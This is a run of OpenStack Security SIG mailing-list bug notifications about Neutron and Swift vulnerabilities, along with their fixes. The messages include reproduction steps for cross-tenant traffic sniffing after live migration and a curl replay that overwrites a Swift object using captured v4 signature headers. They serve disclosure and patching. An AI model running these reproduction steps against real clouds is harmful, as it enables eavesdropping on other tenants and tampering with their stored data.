[Openstack-security] [Bug 1840895] Fix included in openstack/neutron 14.0.3 References: <156637398395.26490.15997468179982387146.malonedeb@gac.canonical.com> Message-ID: <157177347589.25827.18089062393175634564.malone@chaenomeles.canonical.com> This issue was fixed in the openstack/neutron 14.0.3 release. -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1840895 Title: segment parameter check failed when creating network Status in neutron: Fix Released Status in OpenStack Security Advisory: Won't Fix Bug description: neutron net-create test --provider:network_type vlan --provider:segmentation_id 0 Execute commands like this, all vlan in ml2_vlan_allocations table is set to allocated, no vlan network can be created. validate_provider_segment function should check whether provider:segmentation_id is 0. To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1840895/+subscriptions From 1840895 at bugs.launchpad.net Tue Oct 22 19:52:48 2019 From: 1840895 at bugs.launchpad.net (OpenStack Infra) Date: Tue, 22 Oct 2019 19:52:48 -0000 Subject: [Openstack-security] [Bug 1840895] Fix included in openstack/neutron 13.0.5 References: <156637398395.26490.15997468179982387146.malonedeb@gac.canonical.com> Message-ID: <157177396840.25749.16342850210283219877.malone@chaenomeles.canonical.com> This issue was fixed in the openstack/neutron 13.0.5 release. -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1840895 Title: segment parameter check failed when creating network Status in neutron: Fix Released Status in OpenStack Security Advisory: Won't Fix Bug description: neutron net-create test --provider:network_type vlan --provider:segmentation_id 0 Execute commands like this, all vlan in ml2_vlan_allocations table is set to allocated, no vlan network can be created. validate_provider_segment function should check whether provider:segmentation_id is 0. To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1840895/+subscriptions From 1840895 at bugs.launchpad.net Tue Oct 22 19:56:09 2019 From: 1840895 at bugs.launchpad.net (OpenStack Infra) Date: Tue, 22 Oct 2019 19:56:09 -0000 Subject: [Openstack-security] [Bug 1840895] Fix included in openstack/neutron 12.1.1 References: <156637398395.26490.15997468179982387146.malonedeb@gac.canonical.com> Message-ID: <157177416913.25877.12491358623245818860.malone@chaenomeles.canonical.com> This issue was fixed in the openstack/neutron 12.1.1 release. -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1840895 Title: segment parameter check failed when creating network Status in neutron: Fix Released Status in OpenStack Security Advisory: Won't Fix Bug description: neutron net-create test --provider:network_type vlan --provider:segmentation_id 0 Execute commands like this, all vlan in ml2_vlan_allocations table is set to allocated, no vlan network can be created. validate_provider_segment function should check whether provider:segmentation_id is 0. To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1840895/+subscriptions From 1734320 at bugs.launchpad.net Wed Oct 23 01:39:09 2019 From: 1734320 at bugs.launchpad.net (OpenStack Infra) Date: Wed, 23 Oct 2019 01:39:09 -0000 Subject: [Openstack-security] [Bug 1734320] Re: Eavesdropping private traffic References: <151152217834.14483.1577991310209811902.malonedeb@soybean.canonical.com> Message-ID: <157179474952.25660.12811952856042056411.malone@chaenomeles.canonical.com> Reviewed: https://review.opendev.org/686347 Committed: https://git.openstack.org/cgit/openstack/neutron/commit/?id=797a379c51a05fca356d2f2575bfc386b0287afd Submitter: Zuul Branch: stable/pike commit 797a379c51a05fca356d2f2575bfc386b0287afd Author: Sean Mooney Date: Thu Nov 8 16:07:55 2018 +0000 raise priority of dead vlan drop - This change adds a max priority flow to drop all traffic that is associated with the DEAD VLAN 4095. - This change is part of a partial mitigation of bug 1734320. Without this change vlan 4095 traffic will be dropped via a low priority flow after being processed by part/all of the openflow pipeline. By raising the priorty and droping in table 0 we drop invalid packets as soon as they enter the pipeline. Conflicts: neutron/tests/unit/plugins/ml2/drivers/openvswitch/agent/openflow/native/test_br_int.py Change-Id: I3482c7c4f00942828cc9396cd2f3d646c9e8c9d1 Partial-Bug: #1734320 (cherry picked from commit e3dc447b908f57e9acc0378111b8e09cbd88ddc5) ** Tags added: in-stable-pike -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1734320 Title: Eavesdropping private traffic Status in neutron: Fix Committed Status in OpenStack Compute (nova): In Progress Status in os-vif: Fix Released Status in OpenStack Security Advisory: Won't Fix Bug description: Eavesdropping private traffic ============================= Abstract -------- We've discovered a security issue that allows end users within their own private network to receive from, and send traffic to, other private networks on the same compute node. Description ----------- During live-migration there is a small time window where the ports of instances are untagged. Instances have a port trunked to the integration bridge and receive 802.1Q tagged private traffic from other tenants. If the port is administratively down during live migration, the port will remain in trunk mode indefinitely. Traffic is possible between ports is that are administratively down, even between tenants self-service networks. Conditions ---------- The following conditions are necessary. * Openvswitch Self-service networks * An Openstack administrator or an automated process needs to schedule a Live migration We tested this on newton. Issues ------ This outcome is the result of multiple independent issues. We will list the most important first, and follow with bugs that create a fragile situation. Issue #1 Initially creating a trunk port When the port is initially created, it is in trunk mode. This creates a fail-open situation. See: https://github.com/openstack/os-vif/blob/newton-eol/vif_plug_ovs/linux_net.py#L52 Recommendation: create ports in the port_dead state, don't leave it dangling in trunk-mode. Add a drop-flow initially. Issue #2 Order of creation. The instance is actually migrated before the (networking) configuration is completed. Recommendation: wait with finishing the live migration until the underlying configuration has been applied completely. Issue #3 Not closing the port when it is down. Neutron calls the port_dead function to ensure the port is down. It sets the tag to 4095 and adds a "drop" flow if (and only if) there is already another tag on the port. The port_dead function will keep untagged ports untagged. https://github.com/openstack/neutron/blob/stable/newton/neutron/plugins/ml2/drivers/openvswitch/agent/ovs_neutron_agent.py#L995 Recommendation: Make port_dead also shut the port if no tag is found. Log a warning if this happens. Issue #4 Putting the port administratively down actually puts the port on a compute node shared vlan Instances from different projects on different private networks can talk to each other if they put their ports down. The code does install an openflow "drop" rule but it has a lower priority (2) than the allow rules. Recommendation: Increase the port_dead openflow drop rule priority to MAX Timeline --------  2017-09-14 Discovery eavesdropping issue  2017-09-15 Verify workaround.  2017-10-04 Discovery port-down-traffic issue  2017-11-24 Vendor Disclosure to Openstack Steps to reproduce ------------------ 1. Attach an instance to two networks: admin$ openstack server create --nic net-id= --nic net-id = --image --flavor instance_temp 2. Attach a FIP to the instance to be able to log in to this instance 3. Verify: admin$ openstack server show -c name -c addresses fe28a2ee-098f-4425 -9d3c-8e2cd383547d +-----------+-----------------------------------------------------------------------------+ | Field | Value | +-----------+-----------------------------------------------------------------------------+ | addresses | network1=192.168.99.8, ; network2=192.168.80.14 | | name | instance_temp | +-----------+-----------------------------------------------------------------------------+ 4. Ssh to the instance using network1 and run a tcpdump on the other port network2 [root at instance_temp]$ tcpdump -eeenni eth1 5. Get port-id of network2 admin$ nova interface-list fe28a2ee-098f-4425-9d3c-8e2cd383547d +------------+--------------------------------------+--------------------------------------+---------------+-------------------+ | Port State | Port ID | Net ID | IP addresses | MAC Addr | +------------+--------------------------------------+--------------------------------------+---------------+-------------------+ | ACTIVE | a848520b-0814-4030-bb48-49e4b5cf8160 | d69028f7-9558-4f14-8ce6-29cb8f1c19cd | 192.168.80.14 | fa:16:3e:2d:8b:7b | | ACTIVE | fad148ca-cf7a-4839-aac3-a2cd8d1d2260 | d22c22ae-0a42-4e3b-8144-f28534c3439a | 192.168.99.8 | fa:16:3e:60:2c:fa | +------------+--------------------------------------+--------------------------------------+---------------+-------------------+ 6. Force port down on network 2 admin$ neutron port-update a848520b-0814-4030-bb48-49e4b5cf8160 --admin-state-up False 7. Port gets tagged with vlan 4095, the dead vlan tag, which is normal: compute1# grep a848520b-0814-4030-bb48-49e4b5cf8160 /var/log/neutron/neutron-openvswitch-agent.log | tail -1 INFO neutron.plugins.ml2.drivers.openvswitch.agent.ovs_neutron_agent [req-e008feb3-8a35-4c97-adac-b48ff88165b2 - - - - -] VIF port: a848520b-0814-4030-bb48-49e4b5cf8160 admin state up disabled, putting on the dead VLAN 8. Verify the port is tagged with vlan 4095 compute1# ovs-vsctl show | grep -A3 qvoa848520b-08       Port "qvoa848520b-08"           tag: 4095           Interface "qvoa848520b-08" 9. Now live-migrate the instance: admin# nova live-migration fe28a2ee-098f-4425-9d3c-8e2cd383547d 10. Verify the tag is gone on compute2, and take a deep breath compute2# ovs-vsctl show | grep -A3 qvoa848520b-08       Port "qvoa848520b-08"           Interface "qvoa848520b-08"       Port... compute2# echo "Wut!" 11. Now traffic of all other self-service networks present on compute2 can be sniffed from instance_temp [root at instance_temp] tcpdump -eenni eth1 13:14:31.748266 fa:16:3e:6a:17:38 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 10, p 0, ethertype ARP, Request who-has 10.103.12.160 tell 10.103.12.152, length 28 13:14:31.804573 fa:16:3e:e8:a2:d2 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.70, length 28 13:14:31.810482 fa:16:3e:95:ca:3a > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.154, length 28 13:14:31.977820 fa:16:3e:6f:f4:9b > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.150, length 28 13:14:31.979590 fa:16:3e:0f:3d:cc > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 9, p 0, ethertype ARP, Request who-has 10.103.9.163 tell 10.103.9.1, length 28 13:14:32.048082 fa:16:3e:65:64:38 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.101, length 28 13:14:32.127400 fa:16:3e:30:cb:b5 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 10, p 0, ethertype ARP, Request who-has 10.103.12.160 tell 10.103.12.165, length 28 13:14:32.141982 fa:16:3e:96:cd:b0 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.100, length 28 13:14:32.205327 fa:16:3e:a2:0b:76 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.153, length 28 13:14:32.444142 fa:16:3e:1f:db:ed > 01:00:5e:00:00:12, ethertype 802.1Q (0x8100), length 58: vlan 72, p 0, ethertype IPv4, 192.168.99.212 > 224.0.0.18: VRRPv2, Advertisement, vrid 50, prio 103, authtype none, intvl 1s, length 20 13:14:32.449497 fa:16:3e:1c:24:c0 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.20, length 28 13:14:32.476015 fa:16:3e:f2:3b:97 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.22, length 28 13:14:32.575034 fa:16:3e:44:fe:35 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 10, p 0, ethertype ARP, Request who-has 10.103.12.160 tell 10.103.12.163, length 28 13:14:32.676185 fa:16:3e:1e:92:d7 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 10, p 0, ethertype ARP, Request who-has 10.103.12.160 tell 10.103.12.150, length 28 13:14:32.711755 fa:16:3e:99:6c:c8 > 01:00:5e:00:00:12, ethertype 802.1Q (0x8100), length 62: vlan 10, p 0, ethertype IPv4, 10.103.12.154 > 224.0.0.18: VRRPv2, Advertisement, vrid 2, prio 49, authtype simple, intvl 1s, length 24 13:14:32.711773 fa:16:3e:f5:23:d5 > 01:00:5e:00:00:12, ethertype 802.1Q (0x8100), length 58: vlan 12, p 0, ethertype IPv4, 10.103.15.154 > 224.0.0.18: VRRPv2, Advertisement, vrid 1, prio 49, authtype simple, intvl 1s, length 20 Workaround ---------- We temporary fixed this issue by forcing the dead vlan tag on port creation on compute nodes: /usr/lib/python2.7/site-packages/vif_plug_ovs/linux_net.py: def _create_ovs_vif_cmd(bridge, dev, iface_id, mac,                         instance_id, interface_type=None,                         vhost_server_path=None): + # ODCN: initialize port as dead + # ODCN: TODO: set drop flow     cmd = ['--', '--if-exists', 'del-port', dev, '--',             'add-port', bridge, dev, + 'tag=4095',             '--', 'set', 'Interface', dev,             'external-ids:iface-id=%s' % iface_id,             'external-ids:iface-status=active',             'external-ids:attached-mac=%s' % mac,             'external-ids:vm-uuid=%s' % instance_id]     if interface_type:         cmd += ['type=%s' % interface_type]     if vhost_server_path:         cmd += ['options:vhost-server-path=%s' % vhost_server_path]     return cmd https://github.com/openstack/neutron/blob/stable/newton/neutron/plugins/ml2/drivers/openvswitch/agent/ovs_neutron_agent.py#L995     def port_dead(self, port, log_errors=True):         '''Once a port has no binding, put it on the "dead vlan".         :param port: an ovs_lib.VifPort object.         '''         # Don't kill a port if it's already dead         cur_tag = self.int_br.db_get_val("Port", port.port_name, "tag",                                          log_errors=log_errors) + # ODCN GM 20170915 + if not cur_tag: + LOG.error('port_dead(): port %s has no tag', port.port_name) + # ODCN AJS 20170915 + if not cur_tag or cur_tag != constants.DEAD_VLAN_TAG: - if cur_tag and cur_tag != constants.DEAD_VLAN_TAG:            LOG.info('port_dead(): put port %s on dead vlan', port.port_name)            self.int_br.set_db_attribute("Port", port.port_name, "tag",                                          constants.DEAD_VLAN_TAG,                                          log_errors=log_errors)             self.int_br.drop_port(in_port=port.ofport) plugins/ml2/drivers/openvswitch/agent/openflow/ovs_ofctl/ovs_bridge.py     def drop_port(self, in_port): + # ODCN AJS 20171004: - self.install_drop(priority=2, in_port=in_port) + self.install_drop(priority=65535, in_port=in_port) Regards, ODC Noord. Gerhard Muntingh Albert Siersema Paul Peereboom To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1734320/+subscriptions From 1765834 at bugs.launchpad.net Wed Oct 23 17:44:40 2019 From: 1765834 at bugs.launchpad.net (OpenStack Infra) Date: Wed, 23 Oct 2019 17:44:40 -0000 Subject: [Openstack-security] [Bug 1765834] Re: Need to verify content of v4-signed PUTs References: <152425525840.12613.15760107536105434168.malonedeb@gac.canonical.com> Message-ID: <157185268007.3372.15233325323446834643.malone@gac.canonical.com> Reviewed: https://review.opendev.org/689883 Committed: https://git.openstack.org/cgit/openstack/swift/commit/?id=423f96293b6eb43504b5370e893c280697ed23c9 Submitter: Zuul Branch: stable/rocky commit 423f96293b6eb43504b5370e893c280697ed23c9 Author: Tim Burke Date: Tue Dec 11 15:29:35 2018 -0800 Verify client input for v4 signatures This is a combination of 2 commits. ========== Previously, we would use the X-Amz-Content-SHA256 value when calculating signatures, but wouldn't actually check the content that was sent. This would allow a malicious third party that managed to capture the headers for an object upload to overwrite that with arbitrary content provided they could do so within the 5-minute clock-skew window. Now, we wrap the wsgi.input that's sent on to the proxy-server app to hash content as it's read and raise an error if there's a mismatch. Note that clients using presigned-urls to upload have no defense against a similar replay attack. Notwithstanding the above security consideration, this *also* provides better assurances that the client's payload was received correctly. Note that this *does not* attempt to send an etag in footers, however, so the proxy-to-object-server connection is not guarded against bit-flips. In the future, Swift will hopefully grow a way to perform SHA256 verification on the object-server. This would offer two main benefits: - End-to-end message integrity checking. - Move CPU load of calculating the hash from the proxy (which is somewhat CPU-bound) to the object-server (which tends to have CPU to spare). Closes-Bug: 1765834 (cherry picked from commit 3a8f5dbf9c49fdf1cf2d0b7ba35b82f25f88e634) ---------- s3api: Allow clients to upload with UNSIGNED-PAYLOAD (Some versions of?) awscli/boto3 will do v4 signatures but send a Content-MD5 for end-to-end validation. Since a X-Amz-Content-SHA256 is still required to calculate signatures, it uses UNSIGNED-PAYLOAD similar to how signatures work for pre-signed URLs. Look for UNSIGNED-PAYLOAD and skip SHA256 validation if set. (cherry picked from commit 82e446a8a0c0fd6a81f06717b76ed3d1be26a281) (cherry picked from commit 6ed165cf3f65329beaef9977a5fec24ce3ac0b39) ========== Change-Id: I61eb12455c37376be4d739eee55a5f439216f0e9 ** Tags added: in-stable-rocky -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1765834 Title: Need to verify content of v4-signed PUTs Status in OpenStack Security Advisory: Won't Fix Status in OpenStack Object Storage (swift): Fix Released Status in Swift3: New Bug description: When we added support for v4 signatures, we (correctly) require that the client provide a X-Amz-Content-SHA256 header and use it in computing the expected signature. However, we never verify that the content sent actually matches the SHA! As a result, an attacker that manages to capture the headers for a PUT request has a 5-minute window to overwrite the object with arbitrary content of the same length: [11:50:08] $ echo 'GOOD' > good.txt [11:50:12] $ echo 'BAD!' > bad.txt [11:50:36] $ s3cmd put --debug good.txt s3://bucket DEBUG: s3cmd version 1.6.1 DEBUG: ConfigParser: Reading file '/Users/tburke/.s3cfg' DEBUG: ConfigParser: access_key->te...8_chars...r DEBUG: ConfigParser: secret_key->te...4_chars...g DEBUG: ConfigParser: host_base->saio:8080 DEBUG: ConfigParser: host_bucket->saio:8080 DEBUG: ConfigParser: use_https->False DEBUG: Updating Config.Config cache_file -> DEBUG: Updating Config.Config follow_symlinks -> False DEBUG: Updating Config.Config verbosity -> 10 DEBUG: Unicodising 'put' using UTF-8 DEBUG: Unicodising 'good.txt' using UTF-8 DEBUG: Unicodising 's3://bucket' using UTF-8 DEBUG: Command: put DEBUG: DeUnicodising u'good.txt' using UTF-8 INFO: Compiling list of local files... DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: Unicodising '' using UTF-8 DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: Applying --exclude/--include DEBUG: CHECK: good.txt DEBUG: PASS: u'good.txt' INFO: Running stat() and reading/calculating MD5 values on 1 files, this may take some time... DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: doing file I/O to read md5 of good.txt DEBUG: DeUnicodising u'good.txt' using UTF-8 INFO: Summary: 1 local files to upload DEBUG: attr_header: {'x-amz-meta-s3cmd-attrs': 'uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212'} DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: String 'good.txt' encoded to 'good.txt' DEBUG: CreateRequest: resource[uri]=/good.txt DEBUG: Using signature v4 DEBUG: get_hostname(bucket): saio:8080 DEBUG: canonical_headers = content-length:5 content-type:text/plain host:saio:8080 x-amz-content-sha256:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 x-amz-date:20180420T185102Z x-amz-meta-s3cmd-attrs:uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212 x-amz-storage-class:STANDARD DEBUG: Canonical Request: PUT /bucket/good.txt content-length:5 content-type:text/plain host:saio:8080 x-amz-content-sha256:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 x-amz-date:20180420T185102Z x-amz-meta-s3cmd-attrs:uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212 x-amz-storage-class:STANDARD content-length;content-type;host;x-amz-content-sha256;x-amz-date;x-amz-meta-s3cmd-attrs;x-amz-storage-class e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 ---------------------- DEBUG: signature-v4 headers: {'x-amz-content-sha256': 'e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', 'content-length': '5', 'x-amz-storage-class': 'STANDARD', 'x-amz-meta-s3cmd-attrs': 'uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212', 'x-amz-date': '20180420T185102Z', 'content-type': 'text/plain', 'Authorization': 'AWS4-HMAC-SHA256 Credential=test:tester/20180420/US/s3/aws4_request,SignedHeaders=content-length;content-type;host;x-amz-content-sha256;x-amz-date;x-amz-meta-s3cmd-attrs;x-amz-storage-class,Signature=e79e1dd2fcd3ba125d3186abdbaf428992c478ad59380eab4d81510cfc494e43'} DEBUG: Unicodising 'good.txt' using UTF-8 upload: 'good.txt' -> 's3://bucket/good.txt' [1 of 1] DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: Using signature v4 DEBUG: get_hostname(bucket): saio:8080 DEBUG: canonical_headers = content-length:5 content-type:text/plain host:saio:8080 x-amz-content-sha256:d43cf775e7609f1274a4cd97b7649be036b01a6e22d6a04038ecd51811652cf7 x-amz-date:20180420T185102Z x-amz-meta-s3cmd-attrs:uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212 x-amz-storage-class:STANDARD DEBUG: Canonical Request: PUT /bucket/good.txt content-length:5 content-type:text/plain host:saio:8080 x-amz-content-sha256:d43cf775e7609f1274a4cd97b7649be036b01a6e22d6a04038ecd51811652cf7 x-amz-date:20180420T185102Z x-amz-meta-s3cmd-attrs:uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212 x-amz-storage-class:STANDARD content-length;content-type;host;x-amz-content-sha256;x-amz-date;x-amz-meta-s3cmd-attrs;x-amz-storage-class d43cf775e7609f1274a4cd97b7649be036b01a6e22d6a04038ecd51811652cf7 ---------------------- DEBUG: signature-v4 headers: {'x-amz-content-sha256': 'd43cf775e7609f1274a4cd97b7649be036b01a6e22d6a04038ecd51811652cf7', 'content-length': '5', 'x-amz-storage-class': 'STANDARD', 'x-amz-meta-s3cmd-attrs': 'uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212', 'x-amz-date': '20180420T185102Z', 'content-type': 'text/plain', 'Authorization': 'AWS4-HMAC-SHA256 Credential=test:tester/20180420/US/s3/aws4_request,SignedHeaders=content-length;content-type;host;x-amz-content-sha256;x-amz-date;x-amz-meta-s3cmd-attrs;x-amz-storage-class,Signature=63a27138d8f6fd0320a15f8ef8bf95474246c80a38ed68693c58173cefd8589b'} DEBUG: get_hostname(bucket): saio:8080 DEBUG: ConnMan.get(): creating new connection: http://saio:8080 DEBUG: non-proxied HTTPConnection(saio:8080) DEBUG: format_uri(): /bucket/good.txt  5 of 5 100% in 0s 373.44 B/sDEBUG: ConnMan.put(): connection put back to pool (http://saio:8080#1) DEBUG: Response: {'status': 200, 'headers': {'content-length': '0', 'x-amz-id-2': 'tx98be5ca4733e430eb4a76-005ada3696', 'x-trans-id': 'tx98be5ca4733e430eb4a76-005ada3696', 'last-modified': 'Fri, 20 Apr 2018 18:51:03 GMT', 'etag': '"f9d9dc2bab2572ba95cfd67b596a6d1a"', 'x-amz-request-id': 'tx98be5ca4733e430eb4a76-005ada3696', 'date': 'Fri, 20 Apr 2018 18:51:02 GMT', 'content-type': 'text/html; charset=UTF-8', 'x-openstack-request-id': 'tx98be5ca4733e430eb4a76-005ada3696'}, 'reason': 'OK', 'data': '', 'size': 5L}  5 of 5 100% in 0s 56.02 B/s done DEBUG: MD5 sums: computed=f9d9dc2bab2572ba95cfd67b596a6d1a, received="f9d9dc2bab2572ba95cfd67b596a6d1a" /Users/tburke/.virtualenvs/Python27/lib/python2.7/site-packages/magic/identify.py:62: RuntimeWarning: Implicitly cleaning up   CleanupWarning) [11:51:02] $ curl -v http://saio:8080/bucket/good.txt -T bad.txt -H 'x-amz-content-sha256: d43cf775e7609f1274a4cd97b7649be036b01a6e22d6a04038ecd51811652cf7' -H 'x-amz-storage-class: STANDARD' -H 'x-amz-meta-s3cmd-attrs: uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212' -H 'x-amz-date: 20180420T185102Z' -H 'content-type: text/plain' -H 'Authorization: AWS4-HMAC-SHA256 Credential=test:tester/20180420/US/s3/aws4_request,SignedHeaders=content-length;content-type;host;x-amz-content-sha256;x-amz-date;x-amz-meta-s3cmd-attrs;x-amz-storage-class,Signature=63a27138d8f6fd0320a15f8ef8bf95474246c80a38ed68693c58173cefd8589b' * Trying 192.168.8.80... * TCP_NODELAY set * Connected to saio (192.168.8.80) port 8080 (#0) > PUT /bucket/good.txt HTTP/1.1 > Host: saio:8080 > User-Agent: curl/7.54.0 > Accept: application/json;q=1, text/*;q=.9, */*;q=.8 > x-amz-content-sha256: d43cf775e7609f1274a4cd97b7649be036b01a6e22d6a04038ecd51811652cf7 > x-amz-storage-class: STANDARD > x-amz-meta-s3cmd-attrs: uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212 > x-amz-date: 20180420T185102Z > content-type: text/plain > Authorization: AWS4-HMAC-SHA256 Credential=test:tester/20180420/US/s3/aws4_request,SignedHeaders=content-length;content-type;host;x-amz-content-sha256;x-amz-date;x-amz-meta-s3cmd-attrs;x-amz-storage-class,Signature=63a27138d8f6fd0320a15f8ef8bf95474246c80a38ed68693c58173cefd8589b > Content-Length: 5 > Expect: 100-continue > < HTTP/1.1 100 Continue * We are completely uploaded and fine < HTTP/1.1 200 OK < Content-Length: 0 < x-amz-id-2: tx348d466b04cd425b81760-005ada3718 < Last-Modified: Fri, 20 Apr 2018 18:53:13 GMT < ETag: "6cd890020ad6ab38782de144aa831f24" < x-amz-request-id: tx348d466b04cd425b81760-005ada3718 < Content-Type: text/html; charset=UTF-8 < X-Trans-Id: tx348d466b04cd425b81760-005ada3718 < X-Openstack-Request-Id: tx348d466b04cd425b81760-005ada3718 < Date: Fri, 20 Apr 2018 18:53:13 GMT < * Connection #0 to host saio left intact --- I've attached a fix, but it could use tests :-/ To manage notifications about this bug go to: https://bugs.launchpad.net/ossa/+bug/1765834/+subscriptions From obondarev at mirantis.com Thu Oct 24 12:41:14 2019 From: obondarev at mirantis.com (Oleg Bondarev) Date: Thu, 24 Oct 2019 12:41:14 -0000 Subject: [Openstack-security] [Bug 1734320] Re: Eavesdropping private traffic References: <151152217834.14483.1577991310209811902.malonedeb@soybean.canonical.com> Message-ID: <157192087424.29095.8662746616400762200.malone@soybean.canonical.com> Copying here my comment on neutron patch https://review.opendev.org/640258/: not sure the failures are related to DVR: it seems we only run full tempest set with dvr enabled (with OVS). Test failures are mostly about VM not becoming ACTIVE (stuck in BUILD), I guess due to neutron VM port not becoming ACTIVE. This should not be affected by DVR in any way. Also in ovs agent logs I see errors on ovs- vsctl operations with ports having ofport -1. -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1734320 Title: Eavesdropping private traffic Status in neutron: Fix Committed Status in OpenStack Compute (nova): In Progress Status in os-vif: Fix Released Status in OpenStack Security Advisory: Won't Fix Bug description: Eavesdropping private traffic ============================= Abstract -------- We've discovered a security issue that allows end users within their own private network to receive from, and send traffic to, other private networks on the same compute node. Description ----------- During live-migration there is a small time window where the ports of instances are untagged. Instances have a port trunked to the integration bridge and receive 802.1Q tagged private traffic from other tenants. If the port is administratively down during live migration, the port will remain in trunk mode indefinitely. Traffic is possible between ports is that are administratively down, even between tenants self-service networks. Conditions ---------- The following conditions are necessary. * Openvswitch Self-service networks * An Openstack administrator or an automated process needs to schedule a Live migration We tested this on newton. Issues ------ This outcome is the result of multiple independent issues. We will list the most important first, and follow with bugs that create a fragile situation. Issue #1 Initially creating a trunk port When the port is initially created, it is in trunk mode. This creates a fail-open situation. See: https://github.com/openstack/os-vif/blob/newton-eol/vif_plug_ovs/linux_net.py#L52 Recommendation: create ports in the port_dead state, don't leave it dangling in trunk-mode. Add a drop-flow initially. Issue #2 Order of creation. The instance is actually migrated before the (networking) configuration is completed. Recommendation: wait with finishing the live migration until the underlying configuration has been applied completely. Issue #3 Not closing the port when it is down. Neutron calls the port_dead function to ensure the port is down. It sets the tag to 4095 and adds a "drop" flow if (and only if) there is already another tag on the port. The port_dead function will keep untagged ports untagged. https://github.com/openstack/neutron/blob/stable/newton/neutron/plugins/ml2/drivers/openvswitch/agent/ovs_neutron_agent.py#L995 Recommendation: Make port_dead also shut the port if no tag is found. Log a warning if this happens. Issue #4 Putting the port administratively down actually puts the port on a compute node shared vlan Instances from different projects on different private networks can talk to each other if they put their ports down. The code does install an openflow "drop" rule but it has a lower priority (2) than the allow rules. Recommendation: Increase the port_dead openflow drop rule priority to MAX Timeline --------  2017-09-14 Discovery eavesdropping issue  2017-09-15 Verify workaround.  2017-10-04 Discovery port-down-traffic issue  2017-11-24 Vendor Disclosure to Openstack Steps to reproduce ------------------ 1. Attach an instance to two networks: admin$ openstack server create --nic net-id= --nic net-id = --image --flavor instance_temp 2. Attach a FIP to the instance to be able to log in to this instance 3. Verify: admin$ openstack server show -c name -c addresses fe28a2ee-098f-4425 -9d3c-8e2cd383547d +-----------+-----------------------------------------------------------------------------+ | Field | Value | +-----------+-----------------------------------------------------------------------------+ | addresses | network1=192.168.99.8, ; 